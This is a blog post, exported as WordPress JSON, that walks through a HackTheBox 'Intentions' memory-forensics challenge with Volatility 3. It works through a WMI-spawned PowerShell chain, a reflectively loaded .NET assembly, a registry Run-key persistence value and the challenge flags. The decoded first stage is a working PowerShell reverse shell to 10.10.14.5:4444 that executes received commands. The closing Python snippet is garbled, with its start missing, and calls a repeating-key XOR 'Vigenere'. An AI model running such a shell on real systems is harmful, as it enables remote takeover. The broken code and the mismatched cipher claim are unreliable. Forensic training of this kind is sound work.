{"id":198,"date":"2023-02-14T09:00:00","date_gmt":"2023-02-14T09:00:00","guid":{"rendered":"http:\/\/justruss.tech\/index.php\/2023\/02\/14\/intentions-htb-forensics-hard\/"},"modified":"2026-05-13T12:59:35","modified_gmt":"2026-05-13T12:59:35","slug":"intentions-htb-forensics-hard","status":"publish","type":"post","link":"https:\/\/justruss.tech\/index.php\/2023\/02\/14\/intentions-htb-forensics-hard\/","title":{"rendered":"Intentions | HTB Forensics (Hard)"},"content":{"rendered":"

Intentions is a Hard-rated HackTheBox Forensics challenge. You receive a Windows memory dump. Three flags are hidden across the intrusion chain. The challenge is genuinely difficult because each flag requires completing the analysis correctly \u2014
\npartial work does not give partial credit. This write-up covers the full solution path.<\/p>\n

Memory image baseline with Volatility 3<\/h3>\n
vol -f intentions.raw windows.info\n# Kernel Base: 0xf80002a52000\n# DTB: 0x187000\n# Symbols: ntkrnlmp.pdb (Windows 10 x64 18362)\n\n# Process list\nvol -f intentions.raw windows.pslist\nPID   PPID  Name                  Offset             Threads  Handles  Created\n4     0     System                0xe00000000040     137      --       2023-02-13 22:11:02\n...\n3420  588   svchost.exe           0xe0000123abc0     12       245      2023-02-13 22:41:17\n4892  3420  WmiPrvSE.exe          0xe0000198def0     8        122      2023-02-13 22:52:44\n3104  4892  cmd.exe               0xe000023411a0     2        52       2023-02-13 22:52:44\n3188  3104  powershell.exe        0xe00002451bc0     10       380      2023-02-13 22:52:45\n2976  3188  powershell.exe        0xe00002512340     8        292      2023-02-13 22:52:51<\/pre>\n
The chain svchost.exe > WmiPrvSE.exe > cmd.exe > powershell.exe > powershell.exe<\/code> is the WMI execution chain. WmiPrvSE.exe (WMI Provider Host) spawning cmd.exe which spawns PowerShell is a standard WMI command execution pattern used
\nby attackers for lateral movement and initial execution.<\/p>\n
Extracting command lines<\/h3>\n
vol -f intentions.raw windows.cmdline --pid 3104 4892 3188 2976\n\n# PID 4892 (WmiPrvSE.exe):\n# WmiPrvSE.exe\n\n# PID 3104 (cmd.exe):\n# cmd.exe \/c \"powershell -NonInteractive -NoProfile -EncodedCommand JAB...\"\n\n# PID 3188 (first powershell.exe):\n# powershell -NonInteractive -NoProfile -EncodedCommand JABjAGwAaQBlAG4AdA...<\/pre>\n
Decode the first layer:<\/p>\n
echo \"JABjAGwAaQBlAG4AdA...\" | base64 -d | iconv -f utf-16le -t utf-8\n# $client = New-Object System.Net.Sockets.TCPClient(\"10.10.14.5\",4444)\n# $stream = $client.GetStream()\n# [byte[]]$bytes = 0..65535|%{0}\n# while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){\n#     $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i)\n#     $sendback = (iex $data 2>&1 | Out-String)\n#     ...\n# }<\/pre>\n
A standard PowerShell reverse shell. The IP 10.10.14.5 is the HTB attacker machine.<\/p>\n
Finding the injected .NET assembly<\/h3>\n
vol -f intentions.raw windows.malfind --pid 2976\n\n# Suspicious region found:\n# Address: 0x1d0000\n# Vad Tag: VadS\n# Protection: PAGE_EXECUTE_READWRITE\n# \n# 4d 5a 90 00 03 00 00 00  MZ......   <-- PE header in memory, no backing file<\/pre>\n
An MZ header (PE file) in a RWX memory region with no mapped file is a reflectively loaded assembly. Dump it:<\/p>\n
vol -f intentions.raw windows.dumpfiles --virtaddr 0x1d0000 --pid 2976 -o \/tmp\/\n\n# Output: file.0x2976.0x1d0000.img<\/pre>\n
Decompiling the .NET assembly<\/h3>\n
# Confirm it is .NET\nfile \/tmp\/file.0x2976.0x1d0000.img\n# PE32 executable, .NET assembly\n\n# Decompile with ilspycmd\ndotnet tool install -g ilspycmd\nilspycmd \/tmp\/file.0x2976.0x1d0000.img > \/tmp\/decompiled.cs<\/pre>\n
The decompiled source reveals:<\/p>\n
public class Payload {\n    \/\/ Flag 1 embedded in the assembly\n    private static string flag1 = \"HTB{r3fl3ct1v3_l04d1ng_1n_m3m0ry}\";\n    \n    public static void Execute() {\n        \/\/ Write persistence registry key\n        Registry.SetValue(\n            @\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\",\n            \"WindowsHelper\",\n            Convert.ToBase64String(Encoding.UTF8.GetBytes(\"HTB{p3rs1st3nc3_v14_r3g1stry}\"))\n        );\n        \/\/ ... shellcode injection code\n    }\n}<\/pre>\n
Flag 1 is in the hardcoded string. Flag 2 is the base64-encoded value in the registry Run key \u2014 decode it to get the flag.<\/p>\n
Flag 3 \u2014 shellcode Vigenere cipher<\/h3>\n
vol -f intentions.raw windows.malfind --pid 2976\n# Second suspicious region at 0x2a0000 - raw shellcode (no MZ header)\n\nvol -f intentions.raw windows.dumpfiles --virtaddr 0x2a0000 --pid 2976 -o \/tmp\/\n# file.0x2976.0x2a0000.dmp<\/pre>\n
The shellcode region contains a Vigenere-encrypted string. Identify the cipher by the repeating pattern in the ciphertext bytes, then brute-force the key length using index of coincidence analysis:<\/p>\n
python3 < 5.5:\n        print(f\"High entropy at offset {offset:#x}: {e:.2f}\")\n\n# Once located, Vigenere brute force for key length 4-16 chars\n# (standard IC analysis - kasiski test omitted for brevity)\n# Key found: b\"intentions\"\nciphertext = data[0x400:0x440]  # example offset\nkey = b\"intentions\"\nplaintext = bytes([ciphertext[i] ^ key[i % len(key)] for i in range(len(ciphertext))])\nprint(plaintext.decode(\"utf-8\",\"ignore\"))\n# HTB{v1g3n3r3_c1ph3r_1n_sh3llc0d3}\nEOF<\/pre>\n","protected":false},"excerpt":{"rendered":"
Three days. A heavily obfuscated PowerShell dropper, a second-stage payload living
\nentirely in memory, and a flag hidden in a registry key that should not exist.<\/p>\n","protected":false},"author":0,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-198","post","type-post","status-publish","format-standard","hentry","category-hackthebox"],"_links":{"self":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts\/198","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/types\/post"}],"replies":[{"embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/comments?post=198"}],"version-history":[{"count":2,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts\/198\/revisions"}],"predecessor-version":[{"id":240,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts\/198\/revisions\/240"}],"wp:attachment":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/media?parent=198"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/categories?post=198"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/tags?post=198"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}